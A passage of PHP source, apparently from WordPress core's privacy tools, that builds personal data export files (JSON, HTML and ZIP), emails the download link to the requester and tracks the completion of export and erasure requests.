esc_html__( 'Go to top' ) . '</a>'; $group_html .= '</div>'; } $group_html .= '</div>'; return $group_html; } /** * Generate the personal data export file. * * @since 4.9.6 * * @param int $request_id The export request ID. */ function wp_privacy_generate_personal_data_export_file( $request_id ) { if ( ! class_exists( 'ZipArchive' ) ) { wp_send_json_error( __( 'Unable to generate personal data export file. ZipArchive not available.' ) ); } // Get the request. $request = wp_get_user_request( $request_id ); if ( ! $request || 'export_personal_data' !== $request->action_name ) { wp_send_json_error( __( 'Invalid request ID when generating personal data export file.' ) ); } $email_address = $request->email; if ( ! is_email( $email_address ) ) { wp_send_json_error( __( 'Invalid email address when generating personal data export file.' ) ); } // Create the exports folder if needed. $exports_dir = wp_privacy_exports_dir(); $exports_url = wp_privacy_exports_url(); if ( ! wp_mkdir_p( $exports_dir ) ) { wp_send_json_error( __( 'Unable to create personal data export folder.' ) ); } // Protect export folder from browsing. $index_pathname = $exports_dir . 'index.php'; if ( ! file_exists( $index_pathname ) ) { $file = fopen( $index_pathname, 'w' ); if ( false === $file ) { wp_send_json_error( __( 'Unable to protect personal data export folder from browsing.' ) ); } fwrite( $file, "<?php\n// Silence is golden.\n" ); fclose( $file ); } $obscura = wp_generate_password( 32, false, false ); $file_basename = 'wp-personal-data-file-' . $obscura; $html_report_filename = wp_unique_filename( $exports_dir, $file_basename . '.html' ); $html_report_pathname = wp_normalize_path( $exports_dir . $html_report_filename ); $json_report_filename = $file_basename . '.json'; $json_report_pathname = wp_normalize_path( $exports_dir . $json_report_filename ); /* * Gather general data needed. */ // Title. $title = sprintf( /* translators: %s: User's email address. */ __( 'Personal Data Export for %s' ), $email_address ); // First, build an "About" group on the fly for this report. $about_group = array( /* translators: Header for the About section in a personal data export. */ 'group_label' => _x( 'About', 'personal data group label' ), /* translators: Description for the About section in a personal data export. */ 'group_description' => _x( 'Overview of export report.', 'personal data group description' ), 'items' => array( 'about-1' => array( array( 'name' => _x( 'Report generated for', 'email address' ), 'value' => $email_address, ), array( 'name' => _x( 'For site', 'website name' ), 'value' => get_bloginfo( 'name' ), ), array( 'name' => _x( 'At URL', 'website URL' ), 'value' => get_bloginfo( 'url' ), ), array( 'name' => _x( 'On', 'date/time' ), 'value' => current_time( 'mysql' ), ), ), ), ); // And now, all the Groups. $groups = get_post_meta( $request_id, '_export_data_grouped', true ); if ( is_array( $groups ) ) { // Merge in the special "About" group. $groups = array_merge( array( 'about' => $about_group ), $groups ); $groups_count = count( $groups ); } else { if ( false !== $groups ) { _doing_it_wrong( __FUNCTION__, /* translators: %s: Post meta key. */ sprintf( __( 'The %s post meta must be an array.' ), '<code>_export_data_grouped</code>' ), '5.8.0' ); } $groups = null; $groups_count = 0; } // Convert the groups to JSON format. $groups_json = wp_json_encode( $groups ); if ( false === $groups_json ) { $error_message = sprintf( /* translators: %s: Error message. */ __( 'Unable to encode the personal data for export. Error: %s' ), json_last_error_msg() ); wp_send_json_error( $error_message ); } /* * Handle the JSON export. */ $file = fopen( $json_report_pathname, 'w' ); if ( false === $file ) { wp_send_json_error( __( 'Unable to open personal data export file (JSON report) for writing.' ) ); } fwrite( $file, '{' ); fwrite( $file, '"' . $title . '":' ); fwrite( $file, $groups_json ); fwrite( $file, '}' ); fclose( $file ); /* * Handle the HTML export. */ $file = fopen( $html_report_pathname, 'w' ); if ( false === $file ) { wp_send_json_error( __( 'Unable to open personal data export (HTML report) for writing.' ) ); } fwrite( $file, "<!DOCTYPE html>\n" ); fwrite( $file, "<html>\n" ); fwrite( $file, "<head>\n" ); fwrite( $file, "<meta http-equiv='Content-Type' content='text/html; charset=UTF-8' />\n" ); fwrite( $file, "<style type='text/css'>" ); fwrite( $file, 'body { color: black; font-family: Arial, sans-serif; font-size: 11pt; margin: 15px auto; width: 860px; }' ); fwrite( $file, 'table { background: #f0f0f0; border: 1px solid #ddd; margin-bottom: 20px; width: 100%; }' ); fwrite( $file, 'th { padding: 5px; text-align: left; width: 20%; }' ); fwrite( $file, 'td { padding: 5px; }' ); fwrite( $file, 'tr:nth-child(odd) { background-color: #fafafa; }' ); fwrite( $file, '.return-to-top { text-align: right; }' ); fwrite( $file, '</style>' ); fwrite( $file, '<title>' ); fwrite( $file, esc_html( $title ) ); fwrite( $file, '</title>' ); fwrite( $file, "</head>\n" ); fwrite( $file, "<body>\n" ); fwrite( $file, '<h1 id="top">' . esc_html__( 'Personal Data Export' ) . '</h1>' ); // Create TOC. if ( $groups_count > 1 ) { fwrite( $file, '<div id="table_of_contents">' ); fwrite( $file, '<h2>' . esc_html__( 'Table of Contents' ) . '</h2>' ); fwrite( $file, '<ul>' ); foreach ( (array) $groups as $group_id => $group_data ) { $group_label = esc_html( $group_data['group_label'] ); $group_id_attr = sanitize_title_with_dashes( $group_data['group_label'] . '-' . $group_id ); $group_items_count = count( (array) $group_data['items'] ); if ( $group_items_count > 1 ) { $group_label .= sprintf( ' <span class="count">(%d)</span>', $group_items_count ); } fwrite( $file, '<li>' ); fwrite( $file, '<a href="#' . esc_attr( $group_id_attr ) . '">' . $group_label . '</a>' ); fwrite( $file, '</li>' ); } fwrite( $file, '</ul>' ); fwrite( $file, '</div>' ); } // Now, iterate over every group in $groups and have the formatter render it in HTML. foreach ( (array) $groups as $group_id => $group_data ) { fwrite( $file, wp_privacy_generate_personal_data_export_group_html( $group_data, $group_id, $groups_count ) ); } fwrite( $file, "</body>\n" ); fwrite( $file, "</html>\n" ); fclose( $file ); /* * Now, generate the ZIP. * * If an archive has already been generated, then remove it and reuse the filename, * to avoid breaking any URLs that may have been previously sent via email. */ $error = false; // This meta value is used from version 5.5. $archive_filename = get_post_meta( $request_id, '_export_file_name', true ); // This one stored an absolute path and is used for backward compatibility. $archive_pathname = get_post_meta( $request_id, '_export_file_path', true ); // If a filename meta exists, use it. if ( ! empty( $archive_filename ) ) { $archive_pathname = $exports_dir . $archive_filename; } elseif ( ! empty( $archive_pathname ) ) { // If a full path meta exists, use it and create the new meta value. $archive_filename = basename( $archive_pathname ); update_post_meta( $request_id, '_export_file_name', $archive_filename ); // Remove the back-compat meta values. delete_post_meta( $request_id, '_export_file_url' ); delete_post_meta( $request_id, '_export_file_path' ); } else { // If there's no filename or full path stored, create a new file. $archive_filename = $file_basename . '.zip'; $archive_pathname = $exports_dir . $archive_filename; update_post_meta( $request_id, '_export_file_name', $archive_filename ); } $archive_url = $exports_url . $archive_filename; if ( ! empty( $archive_pathname ) && file_exists( $archive_pathname ) ) { wp_delete_file( $archive_pathname ); } $zip = new ZipArchive(); if ( true === $zip->open( $archive_pathname, ZipArchive::CREATE ) ) { if ( ! $zip->addFile( $json_report_pathname, 'export.json' ) ) { $error = __( 'Unable to archive the personal data export file (JSON format).' ); } if ( ! $zip->addFile( $html_report_pathname, 'index.html' ) ) { $error = __( 'Unable to archive the personal data export file (HTML format).' ); } $zip->close(); if ( ! $error ) { /** * Fires right after all personal data has been written to the export file. * * @since 4.9.6 * @since 5.4.0 Added the `$json_report_pathname` parameter. * * @param string $archive_pathname The full path to the export file on the filesystem. * @param string $archive_url The URL of the archive file. * @param string $html_report_pathname The full path to the HTML personal data report on the filesystem. * @param int $request_id The export request ID. * @param string $json_report_pathname The full path to the JSON personal data report on the filesystem. */ do_action( 'wp_privacy_personal_data_export_file_created', $archive_pathname, $archive_url, $html_report_pathname, $request_id, $json_report_pathname ); } } else { $error = __( 'Unable to open personal data export file (archive) for writing.' ); } // Remove the JSON file. unlink( $json_report_pathname ); // Remove the HTML file. unlink( $html_report_pathname ); if ( $error ) { wp_send_json_error( $error ); } } /** * Send an email to the user with a link to the personal data export file * * @since 4.9.6 * * @param int $request_id The request ID for this personal data export. * @return true|WP_Error True on success or `WP_Error` on failure. */ function wp_privacy_send_personal_data_export_email( $request_id ) { // Get the request. $request = wp_get_user_request( $request_id ); if ( ! $request || 'export_personal_data' !== $request->action_name ) { return new WP_Error( 'invalid_request', __( 'Invalid request ID when sending personal data export email.' ) ); } // Localize message content for user; fallback to site default for visitors. if ( ! empty( $request->user_id ) ) { $switched_locale = switch_to_user_locale( $request->user_id ); } else { $switched_locale = switch_to_locale( get_locale() ); } /** This filter is documented in wp-includes/functions.php */ $expiration = apply_filters( 'wp_privacy_export_expiration', 3 * DAY_IN_SECONDS ); $expiration_date = date_i18n( get_option( 'date_format' ), time() + $expiration ); $exports_url = wp_privacy_exports_url(); $export_file_name = get_post_meta( $request_id, '_export_file_name', true ); $export_file_url = $exports_url . $export_file_name; $site_name = wp_specialchars_decode( get_option( 'blogname' ), ENT_QUOTES ); $site_url = home_url(); /** * Filters the recipient of the personal data export email notification. * Should be used with great caution to avoid sending the data export link to wrong emails. * * @since 5.3.0 * * @param string $request_email The email address of the notification recipient. * @param WP_User_Request $request The request that is initiating the notification. */ $request_email = apply_filters( 'wp_privacy_personal_data_email_to', $request->email, $request ); $email_data = array( 'request' => $request, 'expiration' => $expiration, 'expiration_date' => $expiration_date, 'message_recipient' => $request_email, 'export_file_url' => $export_file_url, 'sitename' => $site_name, 'siteurl' => $site_url, ); /* translators: Personal data export notification email subject. %s: Site title. */ $subject = sprintf( __( '[%s] Personal Data Export' ), $site_name ); /** * Filters the subject of the email sent when an export request is completed. * * @since 5.3.0 * * @param string $subject The email subject. * @param string $sitename The name of the site. * @param array $email_data { * Data relating to the account action email. * * @type WP_User_Request $request User request object. * @type int $expiration The time in seconds until the export file expires. * @type string $expiration_date The localized date and time when the export file expires. * @type string $message_recipient The address that the email will be sent to. Defaults * to the value of `$request->email`, but can be changed * by the `wp_privacy_personal_data_email_to` filter. * @type string $export_file_url The export file URL. * @type string $sitename The site name sending the mail. * @type string $siteurl The site URL sending the mail. * } */ $subject = apply_filters( 'wp_privacy_personal_data_email_subject', $subject, $site_name, $email_data ); /* translators: Do not translate EXPIRATION, LINK, SITENAME, SITEURL: those are placeholders. */ $email_text = __( 'Howdy, Your request for an export of personal data has been completed. You may download your personal data by clicking on the link below. For privacy and security, we will automatically delete the file on ###EXPIRATION###, so please download it before then. ###LINK### Regards, All at ###SITENAME### ###SITEURL###' ); /** * Filters the text of the email sent with a personal data export file. * * The following strings have a special meaning and will get replaced dynamically: * ###EXPIRATION### The date when the URL will be automatically deleted. * ###LINK### URL of the personal data export file for the user. * ###SITENAME### The name of the site. * ###SITEURL### The URL to the site. * * @since 4.9.6 * @since 5.3.0 Introduced the `$email_data` array. * * @param string $email_text Text in the email. * @param int $request_id The request ID for this personal data export. * @param array $email_data { * Data relating to the account action email. * * @type WP_User_Request $request User request object. * @type int $expiration The time in seconds until the export file expires. * @type string $expiration_date The localized date and time when the export file expires. * @type string $message_recipient The address that the email will be sent to. Defaults * to the value of `$request->email`, but can be changed * by the `wp_privacy_personal_data_email_to` filter. * @type string $export_file_url The export file URL. * @type string $sitename The site name sending the mail. * @type string $siteurl The site URL sending the mail. */ $content = apply_filters( 'wp_privacy_personal_data_email_content', $email_text, $request_id, $email_data ); $content = str_replace( '###EXPIRATION###', $expiration_date, $content ); $content = str_replace( '###LINK###', sanitize_url( $export_file_url ), $content ); $content = str_replace( '###EMAIL###', $request_email, $content ); $content = str_replace( '###SITENAME###', $site_name, $content ); $content = str_replace( '###SITEURL###', sanitize_url( $site_url ), $content ); $headers = ''; /** * Filters the headers of the email sent with a personal data export file. * * @since 5.4.0 * * @param string|array $headers The email headers. * @param string $subject The email subject. * @param string $content The email content. * @param int $request_id The request ID. * @param array $email_data { * Data relating to the account action email. * * @type WP_User_Request $request User request object. * @type int $expiration The time in seconds until the export file expires. * @type string $expiration_date The localized date and time when the export file expires. * @type string $message_recipient The address that the email will be sent to. Defaults * to the value of `$request->email`, but can be changed * by the `wp_privacy_personal_data_email_to` filter. * @type string $export_file_url The export file URL. * @type string $sitename The site name sending the mail. * @type string $siteurl The site URL sending the mail. * } */ $headers = apply_filters( 'wp_privacy_personal_data_email_headers', $headers, $subject, $content, $request_id, $email_data ); $mail_success = wp_mail( $request_email, $subject, $content, $headers ); if ( $switched_locale ) { restore_previous_locale(); } if ( ! $mail_success ) { return new WP_Error( 'privacy_email_error', __( 'Unable to send personal data export email.' ) ); } return true; } /** * Intercept personal data exporter page Ajax responses in order to assemble the personal data export file. * * @since 4.9.6 * * @see 'wp_privacy_personal_data_export_page' * * @param array $response The response from the personal data exporter for the given page. * @param int $exporter_index The index of the personal data exporter. Begins at 1. * @param string $email_address The email address of the user whose personal data this is. * @param int $page The page of personal data for this exporter. Begins at 1. * @param int $request_id The request ID for this personal data export. * @param bool $send_as_email Whether the final results of the export should be emailed to the user. * @param string $exporter_key The slug (key) of the exporter. * @return array The filtered response. */ function wp_privacy_process_personal_data_export_page( $response, $exporter_index, $email_address, $page, $request_id, $send_as_email, $exporter_key ) { /* Do some simple checks on the shape of the response from the exporter. * If the exporter response is malformed, don't attempt to consume it - let it * pass through to generate a warning to the user by default Ajax processing. */ if ( ! is_array( $response ) ) { return $response; } if ( ! array_key_exists( 'done', $response ) ) { return $response; } if ( ! array_key_exists( 'data', $response ) ) { return $response; } if ( ! is_array( $response['data'] ) ) { return $response; } // Get the request. $request = wp_get_user_request( $request_id ); if ( ! $request || 'export_personal_data' !== $request->action_name ) { wp_send_json_error( __( 'Invalid request ID when merging personal data to export.' ) ); } $export_data = array(); // First exporter, first page? Reset the report data accumulation array. if ( 1 === $exporter_index && 1 === $page ) { update_post_meta( $request_id, '_export_data_raw', $export_data ); } else { $accumulated_data = get_post_meta( $request_id, '_export_data_raw', true ); if ( $accumulated_data ) { $export_data = $accumulated_data; } } // Now, merge the data from the exporter response into the data we have accumulated already. $export_data = array_merge( $export_data, $response['data'] ); update_post_meta( $request_id, '_export_data_raw', $export_data ); // If we are not yet on the last page of the last exporter, return now. /** This filter is documented in wp-admin/includes/ajax-actions.php */ $exporters = apply_filters( 'wp_privacy_personal_data_exporters', array() ); $is_last_exporter = count( $exporters ) === $exporter_index; $exporter_done = $response['done']; if ( ! $is_last_exporter || ! $exporter_done ) { return $response; } // Last exporter, last page - let's prepare the export file. // First we need to re-organize the raw data hierarchically in groups and items. $groups = array(); foreach ( (array) $export_data as $export_datum ) { $group_id = $export_datum['group_id']; $group_label = $export_datum['group_label']; $group_description = ''; if ( ! empty( $export_datum['group_description'] ) ) { $group_description = $export_datum['group_description']; } if ( ! array_key_exists( $group_id, $groups ) ) { $groups[ $group_id ] = array( 'group_label' => $group_label, 'group_description' => $group_description, 'items' => array(), ); } $item_id = $export_datum['item_id']; if ( ! array_key_exists( $item_id, $groups[ $group_id ]['items'] ) ) { $groups[ $group_id ]['items'][ $item_id ] = array(); } $old_item_data = $groups[ $group_id ]['items'][ $item_id ]; $merged_item_data = array_merge( $export_datum['data'], $old_item_data ); $groups[ $group_id ]['items'][ $item_id ] = $merged_item_data; } // Then save the grouped data into the request. delete_post_meta( $request_id, '_export_data_raw' ); update_post_meta( $request_id, '_export_data_grouped', $groups ); /** * Generate the export file from the collected, grouped personal data. * * @since 4.9.6 * * @param int $request_id The export request ID. */ do_action( 'wp_privacy_personal_data_export_file', $request_id ); // Clear the grouped data now that it is no longer needed. delete_post_meta( $request_id, '_export_data_grouped' ); // If the destination is email, send it now. if ( $send_as_email ) { $mail_success = wp_privacy_send_personal_data_export_email( $request_id ); if ( is_wp_error( $mail_success ) ) { wp_send_json_error( $mail_success->get_error_message() ); } // Update the request to completed state when the export email is sent. _wp_privacy_completed_request( $request_id ); } else { // Modify the response to include the URL of the export file so the browser can fetch it. $exports_url = wp_privacy_exports_url(); $export_file_name = get_post_meta( $request_id, '_export_file_name', true ); $export_file_url = $exports_url . $export_file_name; if ( ! empty( $export_file_url ) ) { $response['url'] = $export_file_url; } } return $response; } /** * Mark erasure requests as completed after processing is finished. * * This intercepts the Ajax responses to personal data eraser page requests, and * monitors the status of a request. Once all of the processing has finished, the * request is marked as completed. * * @since 4.9.6 * * @see 'wp_privacy_personal_data_erasure_page' * * @param array $response The response from the personal data eraser for * the given page. * @param int $eraser_index The index of the personal data eraser. Begins * at 1. * @param string $email_address The email address of the user whose personal * data this is. * @param int $page The page of personal data for this eraser. * Begins at 1. * @param int $request_id The request ID for this personal data erasure. * @return array The filtered response. */ function wp_privacy_process_personal_data_erasure_page( $response, $eraser_index, $email_address, $page, $request_id ) { /* * If the eraser response is malformed, don't attempt to consume it; let it * pass through, so that the default Ajax processing will generate a warning * to the user. */ if ( ! is_array( $response ) ) { return $response; } if ( ! array_key_exists( 'done', $response ) ) { return $response; } if ( ! array_key_exists( 'items_removed', $response ) ) { return $response; } if ( ! array_key_exists( 'items_retained', $response ) ) { return $response; } if ( ! array_key_exists( 'messages', $response ) ) { return $response; } // Get the request. $request = wp_get_user_request( $request_id ); if ( ! $request || 'remove_personal_data' !== $request->action_name ) { wp_send_json_error( __( 'Invalid request ID when processing personal data to erase.' ) ); } /** This filter is documented in wp-admin/includes/ajax-actions.php */ $erasers = apply_filters( 'wp_privacy_personal_data_erasers', array() ); $is_last_eraser = count( $erasers ) === $eraser_index; $eraser_done = $response['done']; if ( ! $is_last_eraser || ! $eraser_done ) { return $response; } _wp_privacy_completed_request( $request_id ); /** * Fires immediately after a personal data erasure request has been marked completed. * * @since 4.9.6 * * @param int $request_id The privacy request post ID associated with this request. */ do_action( 'wp_privacy_personal_data_erased', $request_id ); return $response; }